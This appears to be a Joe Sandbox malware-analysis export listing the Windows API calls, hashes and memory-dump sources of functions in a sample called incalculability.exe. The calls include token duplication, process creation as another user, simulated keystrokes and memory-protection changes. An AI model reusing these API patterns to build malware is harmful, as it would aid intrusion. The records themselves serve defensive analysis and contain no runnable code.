                            • Opcode ID: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                            • Instruction ID: 5fcdf068f8d8459ddaa7ea8882eac3df2259875866eaebb33036fc29c92b3e87
                            • Opcode Fuzzy Hash: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                            • Instruction Fuzzy Hash: BB2184719083019FC300DF5ADC8190ABBE4FB84358F40493FF988A7392D735D9458B9A
                            APIs
                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 0040F13A
                            • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 00426326
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: CreateFile
                            • String ID:
                            • API String ID: 823142352-0
                            • Opcode ID: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
                            • Instruction ID: 8a88c5525f76e0b0fff62cf48ad84dc7055e673dbb4ccc29545257d8619b8f55
                            • Opcode Fuzzy Hash: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
                            • Instruction Fuzzy Hash: 16011D70784310BAF2305A68DD0BF5266546B45B24F20473ABBE5BE2D1D2F86885870C
                            APIs
                              • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                            • __lock_file.LIBCMT ref: 00414A8D
                              • Part of subcall function 00415471: __lock.LIBCMT ref: 00415496
                            • __fclose_nolock.LIBCMT ref: 00414A98
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                            • String ID:
                            • API String ID: 2800547568-0
                            • Opcode ID: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                            • Instruction ID: d9443fdd3ee0a3059f5d17ec53abbfe2105cc8a5d10ddad395bff0ae1f283336
                            • Opcode Fuzzy Hash: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                            • Instruction Fuzzy Hash: EEF0F6308417019AD710AB7588027EF37A09F41379F22864FA061961D1C73C85C29B5D
                            APIs
                            • __lock_file.LIBCMT ref: 00415012
                            • __ftell_nolock.LIBCMT ref: 0041501F
                              • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: __ftell_nolock__getptd_noexit__lock_file
                            • String ID:
                            • API String ID: 2999321469-0
                            • Opcode ID: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                            • Instruction ID: e3e7bc223609ce985a1750c66bb322057640979a4505571362f253753ce4bf01
                            • Opcode Fuzzy Hash: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                            • Instruction Fuzzy Hash: 64F03030900605EADB107FB5DD027EE3B70AF443A8F20825BB0259A0E1DB7C8AC29A59
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: _memmove
                            • String ID:
                            • API String ID: 4104443479-0
                            • Opcode ID: 224a1bccd0668171228bffd00b4e167e84225026459a60d9317a1c29c8a59c26
                            • Instruction ID: 6397ebbfaf442e519c955e074037b65107783079284990db5ef0c3dd021860ed
                            • Opcode Fuzzy Hash: 224a1bccd0668171228bffd00b4e167e84225026459a60d9317a1c29c8a59c26
                            • Instruction Fuzzy Hash: 36317371E00209EBDF009F52E9866AEFBF4FF40740F2189BED855E2650E7389990D759
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: ProtectVirtual
                            • String ID:
                            • API String ID: 544645111-0
                            • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                            • Instruction ID: 21b87f0337b3904faf2e49e7d89a80b8c5538d611ad57d97d778efbd48141229
                            • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                            • Instruction Fuzzy Hash: 8131F770A00105DBC718DF88E590AAAF7B1FB49310B6486A6E409CF355DB78EDC1CBD9
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e5559574dc10eca8e97d8025a500eef8ee7d185e3c773571fee143e03780f234
                            • Instruction ID: 427b4a632c312742ac0951887501238d3178a51c37fde1d0fd35c98815df3d2a
                            • Opcode Fuzzy Hash: e5559574dc10eca8e97d8025a500eef8ee7d185e3c773571fee143e03780f234
                            • Instruction Fuzzy Hash: 21119674200201ABDB249F36D984E26B3A5AF45304B244D2FF9C5D7790DB7CE881DB5E
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 35b7bc891c26268d2cb6d46035521dde4ecfc0337a7d2d2d45483da740e67eee
                            • Instruction ID: fe3c5e01fee558804f1d0cd68762aa03bf47037873853bda5dcd607d85013340
                            • Opcode Fuzzy Hash: 35b7bc891c26268d2cb6d46035521dde4ecfc0337a7d2d2d45483da740e67eee
                            • Instruction Fuzzy Hash: 2D118B352046019FDB10DF69D884E96B3E9AF8A314F14856EFD298B362CB35FC41CB95
                            APIs
                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                            • _memmove.LIBCMT ref: 00444B34
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: _malloc_memmove
                            • String ID:
                            • API String ID: 1183979061-0
                            • Opcode ID: 5456aa698ccb66e472ad2dc6bdf94112e2600af6ff6d776df7a489d92d6f0097
                            • Instruction ID: 1ab6fe9f530497837eb86deb75815884a9af672873ccf792f11a5e6f6739e6df
                            • Opcode Fuzzy Hash: 5456aa698ccb66e472ad2dc6bdf94112e2600af6ff6d776df7a489d92d6f0097
                            • Instruction Fuzzy Hash: E0016D3220410AAFD714DF2CC882DA7B3EDEF88318711492FE996C7251EA74F9508B94
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: __lock_file
                            • String ID:
                            • API String ID: 3031932315-0
                            • Opcode ID: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                            • Instruction ID: 324047821ed349453e17c5e7f52af34d31ade4ebcb64e32b23ce3c6ad3b356a0
                            • Opcode Fuzzy Hash: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                            • Instruction Fuzzy Hash: FF011E71801219EBCF21AFA5C8028DF7B71AF44764F11851BF824551A1E7398AE2DBD9
                            APIs
                            • WriteFile.KERNELBASE(?,?,?,?,00000000,?,?,?,004263D0,?,00487ACC,00000003,0040DE90,?,?,00000001), ref: 00443E54
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: FileWrite
                            • String ID:
                            • API String ID: 3934441357-0
                            • Opcode ID: 873a582ac05df194872d3361efdc1b64d97226b1633050e8059638026df5ad0f
                            • Instruction ID: f8d6e32d6ecef3e6c51c5ea05c7ff41eb941b2b6d152ec47b845c679c5cedb0e
                            • Opcode Fuzzy Hash: 873a582ac05df194872d3361efdc1b64d97226b1633050e8059638026df5ad0f
                            • Instruction Fuzzy Hash: 6BE01276100318ABDB10DF98D844FDA77BCEF48765F10891AFA048B200C7B4EA908BE4
                            APIs
                            • GetFileAttributesW.KERNELBASE(?), ref: 03F2611B
                            Memory Dump Source
                            • Source File: 00000005.00000002.1900399949.0000000003F25000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F25000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3f25000_incalculability.jbxd
                            Similarity
                            • API ID: AttributesFile
                            • String ID:
                            • API String ID: 3188754299-0
                            • Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                            • Instruction ID: f9875edb1435160fb3b0cbb6b35c6b67aa44faa9f5ef81fb94b5aa76aa77703f
                            • Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                            • Instruction Fuzzy Hash: 6EE0C231A1521CEBCB20CBB8CC04AAD7BA8D705724F004754E847C32C1D5B5AAA19714
                            APIs
                            • GetFileAttributesW.KERNELBASE(?), ref: 03F260EB
                            Memory Dump Source
                            • Source File: 00000005.00000002.1900399949.0000000003F25000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F25000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3f25000_incalculability.jbxd
                            Similarity
                            • API ID: AttributesFile
                            • String ID:
                            • API String ID: 3188754299-0
                            • Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                            • Instruction ID: f8ffbbbbb80e6d4d71e232cae591ca9d4a9ae2a55e4bf6e7f046636322e581fe
                            • Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                            • Instruction Fuzzy Hash: B1D0A73190520CEBCB10CFB89C049DA7BACD704321F004764FD15C3280DA7199409750
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: __wfsopen
                            • String ID:
                            • API String ID: 197181222-0
                            • Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                            • Instruction ID: b34ddb7a850719c89311ce964fc9f65e9e9400c6a390d5c1cbb008c3125e494a
                            • Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                            • Instruction Fuzzy Hash: 82C092B244020C77CF112A93EC02F9A3F1E9BC0764F058021FB1C1A162AA77EAA19689
                            APIs
                            • CloseHandle.KERNELBASE(?,?,00426FBF), ref: 0040DA3D
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: CloseHandle
                            • String ID:
                            • API String ID: 2962429428-0
                            • Opcode ID: 4893ac657bcef9b9334a0355bd28ce0f0291ef024a1c9f1561977d8c5be9d70a
                            • Instruction ID: 552ddd844a8bbede063c80161f66c4637379340f91e2bb70a518b226642b2913
                            • Opcode Fuzzy Hash: 4893ac657bcef9b9334a0355bd28ce0f0291ef024a1c9f1561977d8c5be9d70a
                            • Instruction Fuzzy Hash: B9E045B4A04B008BC6308F5BE444416FBF8EEE46203108E1FD4A6C2A64C3B4A1498F50
                            APIs
                            • Sleep.KERNELBASE(000001F4), ref: 03F27B31
                            Memory Dump Source
                            • Source File: 00000005.00000002.1900399949.0000000003F25000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F25000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3f25000_incalculability.jbxd
                            Similarity
                            • API ID: Sleep
                            • String ID:
                            • API String ID: 3472027048-0
                            • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                            • Instruction ID: f492a1d406a90fa8b83a28076c011e45d8e32e8b4016b9ae24bc8000ed8c4efa
                            • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                            • Instruction Fuzzy Hash: 7EE0BF7494110DEFDB00EFA8D9496DE7FB4EF04702F1005A1FD05D7681DB309E548A62
                            APIs
                            • Sleep.KERNELBASE(000001F4), ref: 03F27B31
                            Memory Dump Source
                            • Source File: 00000005.00000002.1900399949.0000000003F25000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F25000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3f25000_incalculability.jbxd
                            Similarity
                            • API ID: Sleep
                            • String ID:
                            • API String ID: 3472027048-0
                            • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                            • Instruction ID: 74e54c2194ef16152f9982e12e56a8bb218fc7ff852a7d4ed337ce308aefa0ee
                            • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                            • Instruction Fuzzy Hash: E2E0E67494110DDFDB00EFB8D94969E7FB4EF04702F1001A1FD01D2281D6309D508A72
                            APIs
                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C8E1
                            • DefDlgProcW.USER32(?,0000004E,?,?), ref: 0047C8FC
                            • GetKeyState.USER32(00000011), ref: 0047C92D
                            • GetKeyState.USER32(00000009), ref: 0047C936
                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C949
                            • GetKeyState.USER32(00000010), ref: 0047C953
                            • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C967
                            • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C993
                            • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C9B6
                            • _wcsncpy.LIBCMT ref: 0047CA29
                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047CA5A
                            • SendMessageW.USER32 ref: 0047CA7F
                            • InvalidateRect.USER32(?,00000000,00000001), ref: 0047CADF
                            • SendMessageW.USER32(?,00001030,?,0047EA68), ref: 0047CB84
                            • ImageList_SetDragCursorImage.COMCTL32(009099B8,00000000,00000000,00000000), ref: 0047CB9B
                            • ImageList_BeginDrag.COMCTL32(009099B8,00000000,000000F8,000000F0), ref: 0047CBAC
                            • SetCapture.USER32(?), ref: 0047CBB6
                            • ClientToScreen.USER32(?,?), ref: 0047CC17
                            • ImageList_DragEnter.COMCTL32(00000000,?,?,?,?), ref: 0047CC26
                            • ReleaseCapture.USER32 ref: 0047CC3A
                            • GetCursorPos.USER32(?), ref: 0047CC72
                            • ScreenToClient.USER32(?,?), ref: 0047CC80
                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CCE6
                            • SendMessageW.USER32 ref: 0047CD12
                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CD53
                            • SendMessageW.USER32 ref: 0047CD80
                            • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0047CD99
                            • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0047CDAA
                            • GetCursorPos.USER32(?), ref: 0047CDC8
                            • ScreenToClient.USER32(?,?), ref: 0047CDD6
                            • GetParent.USER32(00000000), ref: 0047CDF7
                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CE60
                            • SendMessageW.USER32 ref: 0047CE93
                            • ClientToScreen.USER32(?,?), ref: 0047CEEE
                            • TrackPopupMenuEx.USER32(?,00000000,?,?,02E11B70,00000000,?,?,?,?), ref: 0047CF1C
                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CF46
                            • SendMessageW.USER32 ref: 0047CF6B
                            • ClientToScreen.USER32(?,?), ref: 0047CFB5
                            • TrackPopupMenuEx.USER32(?,00000080,?,?,02E11B70,00000000,?,?,?,?), ref: 0047CFE6
                            • GetWindowLongW.USER32(?,000000F0), ref: 0047D086
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: MessageSend$ClientScreen$Image$CursorDragList_State$CaptureLongMenuPopupTrackWindow$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                            • String ID: @GUI_DRAGID$F
                            • API String ID: 3100379633-4164748364
                            • Opcode ID: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                            • Instruction ID: 980357f173c9be8e312ccaa606797ee7157b6525bda81ee0817efdfc4c954517
                            • Opcode Fuzzy Hash: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                            • Instruction Fuzzy Hash: F842AD706043419FD714DF28C884FABB7A5FF89700F14865EFA489B291C7B8E846CB5A
                            APIs
                            • GetForegroundWindow.USER32 ref: 00434420
                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00434446
                            • IsIconic.USER32(?), ref: 0043444F
                            • ShowWindow.USER32(?,00000009), ref: 0043445C
                            • SetForegroundWindow.USER32(?), ref: 0043446A
                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434481
                            • GetCurrentThreadId.KERNEL32 ref: 00434485
                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434493
                            • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A2
                            • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A8
                            • AttachThreadInput.USER32(00000000,?,00000001), ref: 004344B1
                            • SetForegroundWindow.USER32(00000000), ref: 004344B7
                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344C6
                            • keybd_event.USER32(00000012,00000000), ref: 004344CF
                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344DD
                            • keybd_event.USER32(00000012,00000000), ref: 004344E6
                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344F4
                            • keybd_event.USER32(00000012,00000000), ref: 004344FD
                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043450B
                            • keybd_event.USER32(00000012,00000000), ref: 00434514
                            • SetForegroundWindow.USER32(00000000), ref: 0043451E
                            • AttachThreadInput.USER32(00000000,?,00000000), ref: 0043453F
                            • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434545
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: ThreadWindow$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                            • String ID: Shell_TrayWnd
                            • API String ID: 2889586943-2988720461
                            • Opcode ID: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                            • Instruction ID: 0b42b206f44700a00bd4aa1610e9651ae8f7722fee000eb3c659fd44b6abead8
                            • Opcode Fuzzy Hash: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                            • Instruction Fuzzy Hash: AD416272640218BFE7205BA4DE4AFBE7B6CDB58B11F10442EFA01EA1D0D6F458419BA9
                            APIs
                            • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 0044638E
                            • CloseHandle.KERNEL32(?), ref: 004463A0
                            • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004463B8
                            • GetProcessWindowStation.USER32 ref: 004463D1
                            • SetProcessWindowStation.USER32(00000000), ref: 004463DB
                            • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004463F7
                            • _wcslen.LIBCMT ref: 00446498
                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                            • _wcsncpy.LIBCMT ref: 004464C0
                            • LoadUserProfileW.USERENV(?,00000020), ref: 004464D9
                            • CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 004464F3
                            • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,000F01FF,00000400), ref: 00446522
                            • UnloadUserProfile.USERENV(?,?), ref: 00446555
                            • CloseWindowStation.USER32(00000000), ref: 0044656C
                            • CloseDesktop.USER32(?), ref: 0044657A
                            • SetProcessWindowStation.USER32(?), ref: 00446588
                            • CloseHandle.KERNEL32(?), ref: 00446592
                            • DestroyEnvironmentBlock.USERENV(?), ref: 004465A9
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_wcslen_wcsncpy
                            • String ID: $@OH$default$winsta0
                            • API String ID: 3324942560-3791954436
                            • Opcode ID: 4d1d68c1aea3dabcf030405aafb24e1344eb51be90ba82aa3e7b9bd6ceeac822
                            • Instruction ID: a255b9755a473e3b45922b0ee48cea4cb67e1360e8ecd59b8ab49ad27cdc7b44
                            • Opcode Fuzzy Hash: 4d1d68c1aea3dabcf030405aafb24e1344eb51be90ba82aa3e7b9bd6ceeac822
                            • Instruction Fuzzy Hash: A28180B0A00209ABEF10CFA5DD4AFAF77B8AF49704F05455EF914A7284D778D901CB69
                            APIs
                              • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\AppData\Local\inhumate\incalculability.exe,0040F545,C:\Users\user\AppData\Local\inhumate\incalculability.exe,004A90E8,C:\Users\user\AppData\Local\inhumate\incalculability.exe,?,0040F545), ref: 0041013C
                              • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 0043392E
                              • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 00433950
